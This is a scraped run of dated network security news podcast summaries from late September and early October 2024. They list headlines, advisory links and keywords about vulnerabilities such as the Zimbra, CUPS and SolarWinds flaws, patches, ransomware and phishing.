Hurricane Aftermath; Zimbra Vuln and Exploit; MSFT Edge Extension Security; Supermicro BMC flaw Hurricane Helene Aftermath - Cyber Security Awareness Month https://isc.sans.edu/diary/Hurricane%20Helene%20Aftermath%20-%20Cyber%20Security%20Awareness%20Month/31314 Zimbra - Remote Command Execution (CVE-2024-45519) https://blog.projectdiscovery.io/zimbra-remote-code-execution/ Enhancing the security of Microsoft Edge extensions with the new Publish API https://blogs.windows.com/msedgedev/2024/09/30/enhanced-security-for-extensions-with-new-publish-api/ CVE-2024-36435 Deep-Dive: The Year's Most Critical BMC Security Flaw https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw keywords: supermicro; bmc; edge; microsoft; extensions; zimbra; helene; cyber security awareness month;
Network Security News Summary for Tuesday October 01th, 2024
Mac-Robber Update; Recall Re-Released; Hybrid Cloud Attacks; Ransomware IDs; What's Up Gold Patch; Tool Update: mac-robber.py, le-hex-to-ip.py https://isc.sans.edu/diary/Tool%20update%3A%20mac-robber.py%20and%20le-hex-to-ip.py/31310 Ransomware Attacks Expanding to Hybrid Cloud Environments https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/ Update on Recall Security and Privacy Architecture https://blogs.windows.com/windowsexperience/2024/09/27/update-on-recall-security-and-privacy-architecture/ Detecting Ransomware in Windows Event Logs https://blogs.jpcert.or.jp/en/2024/09/windows.html Progress WhatsUp Gold Update https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-September-2024?popup=true&overview Singapore Class https://jbu.me/singapore keywords: singapore; ransomware; event logs; windows; whatsup gold; progress; recall; cloud; hybrid; mac-robber; le-hex-to-ip
Network Security News Summary for Monday September 30th, 2024
CUPS Vulnerability Update; PHP Updates; Chinese Firewall and DNS; HPE Aruba Patches CUPS Vulnerability https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302 PHP Updates https://www.php.net/ChangeLog-8.php#8.1.30 DNS And Big Chinese Firewall https://www.assetnote.io/resources/research/insecurity-through-censorship-vulnerabilities-caused-by-the-great-firewall https://isc.sans.edu/diary/Are+You+Piratebay+thepiratebayorg+Resolving+to+Various+Hosts/19175 HPE Aruba Networking Vulnerabilities https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04712en_us&docLocale=en_US keywords: hpe; aruba; dns; firewall; php; updates; cups; vulnerability
Network Security News Summary for Friday September 27th, 2024
Patch for Critical CUPS vulnerability: Don't Panic Patch for Critical CUPS vulnerability: Don't Panic https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302 keywords: cups; browsed; filter; evilsocket
Network Security News Summary for Thursday September 26th, 2024
Corrupt DNS DDoS; SolarWindows Hard Coded Credentials; Watchguard Advisory; Infostealers and Encrypted Cookie Data DNS Reflection Update and Corrupted DNS Requests https://isc.sans.edu/diary/DNS%20Reflection%20Update%20and%20Odd%20Corrupted%20DNS%20Requests/31296 CVE-2024-28987 Solarwinds Web Help Desk Hardcoded Credentials Vulnerability https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/ cve-2024-28987 Watchguard Unauthenticated and Unencrypted SSO Protocol https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-006/ https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2024-00014 Infostealers Overcome Chrome's App Bound Encryption https://securityonline.info/infostealers-overcome-chromes-app-bound-encryption-threatening-user-data-security/ keywords: chrome; cookies; infostealer; watchguard; solarwinds; helpdesk; dns; reflection; dos; ddos
Network Security News Summary for Wednesday September 25th, 2024
RAISECOM Exploit; Cellopoint Vuln; Cisco Smart Licensing Details; Ivanty Traffic Manager Exploited; Linux Vulnerablity Controversy; Exploitation of RAISECOM Gateway Devices CVE-2024-7120 https://isc.sans.edu/diary/Exploitation%20of%20RAISECOM%20Gateway%20Devices%20Vulnerability%20CVE-2024-7120/31292 Cellopoint Vulnerability CVE-2024-9043 https://www.twcert.org.tw/en/cp-139-8103-b0568-2.html Cisco Smart Licensing Vulnerability Details https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html Ivanti Virtual Traffic Manager Exploited https://www.cisa.gov/known-exploited-vulnerabilities-catalog GNU Linux Systems Possible Critical Vulnerability https://securityonline.info/severe-unauthenticated-rce-flaw-cvss-9-9-in-gnu-linux-systems-awaiting-full-disclosure/ keywords: linux; gnu; vulnerability; controversy; ivanti; virtual traffic manager; cisco; smart licensing; cellopoint; raisecom
Network Security News Summary for Tuesday September 24th, 2024
Resurected Phishing Tricks; Kaspersky installs Ultra AV; Microchip ASF tinydhcp Vulnerability; Phishing Links With @ Sign https://isc.sans.edu/diary/Phishing%20links%20with%20%40%20sign%20and%20the%20need%20for%20effective%20security%20awareness%20building/31288 Kaspersky Deletes Itself Installs UltraAV Antivirus Without Warning https://www.bleepingcomputer.com/news/security/kaspersky-deletes-itself-installs-ultraav-antivirus-without-warning/ Microchip ASF tinydhcp Vulnerability https://kb.cert.org/vuls/id/138043 keywords: microchip; asf; tinydhcp; kaspersky; ultraav; antivirus; phishing
Network Security News Summary for Monday September 23th, 2024
WSUS Deprecation; Windows Hotpatches; WHOIS and Certificates; Versa Vuln; Apache HugeGraph Exploit Windows Server Update Services Deprecation https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-server-update-services-wsus-deprecation/ba-p/4250436 Windows Server 2025 Hotpatches https://techcommunity.microsoft.com/t5/windows-server-news-and-best/now-in-preview-hotpatch-for-windows-server-2025/ba-p/4248296 Google Suggests Not Using WHOIS for Certificate Validation https://lists.cabforum.org/pipermail/servercert-wg/2024-September/004821.html Versa Director Vulnerability https://security-portal.versa-networks.com/emailbulletins/66e4a8ebda545d61ec2b1ab9 Apache Hugegraph Vulnerability Exploited https://nvd.nist.gov/vuln/detail/CVE-2024-27348 keywords: apache; hugegraph; versa; director; google; whois; certificate; windows; server; hotpatches; Update; WSUS
Network Security News Summary for Friday September 20th, 2024
Fake GitHub Notices; More Iventi CVS Vulns; Deanonymizing Tor; iPhone Unlockers; Fake GitHub Site Targeting Developers https://isc.sans.edu/diary/Fake%20GitHub%20Site%20Targeting%20Developers/31282 Ivanti CSA 4.6 Advisory https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US German Police Deanonymizes Tor User https://blog.torproject.org/tor-is-still-safe/ Ever wonder how crooks get the credentials to unlock stolen phones? https://arstechnica.com/security/2024/09/cops-bust-website-crooks-used-to-unlock-1-2-million-stolen-mobile-phones/ keywords: iphone; unlocker; police; tor; ivatny; csa; github; fake; phishing; developers
Network Security News Summary for Thursday September 19th, 2024
Python Infostealer Targeting Exodus; Service Now KB Leaks; GitLab Patch; Aruba Patch; Python Infostealer Patching Windows Exodus App https://isc.sans.edu/diary/Python%20Infostealer%20Patching%20Windows%20Exodus%20App/31276 Service Now Knoledge Bases Data Exposures https://appomni.com/ao-labs/servicenow-knowledge-bases-data-exposures-uncovered/ Gitlab Patch https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/ Aruba Patch https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04709en_us&docLocale=en_US keywords: aruba; gitlab; service now; python; exodus
Network Security News Summary for Wednesday September 18th, 2024
Python Exfiltration; VMWare VCenter Patch; macOS Calendar Exploit; 23:59, Time to Exfiltrate! https://isc.sans.edu/diary/23%3A59%2C%20Time%20to%20Exfiltrate!/31272 Critical VMWare VCenter Vulnerability https://blogs.vmware.com/cloud-foundation/2024/09/17/vmsa-2024-0019-questions-answers/ Zero-Click Calendar invite - Critical zero-click vulnerability chain in macOS https://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b Google Adds Latest Post Quantum Encryption Standard to Chrome https://security.googleblog.com/2024/09/a-new-path-for-kyber-on-web.html keywords: python; firebase; vmware; vcenter; calendar; macos; google; chrome; quantum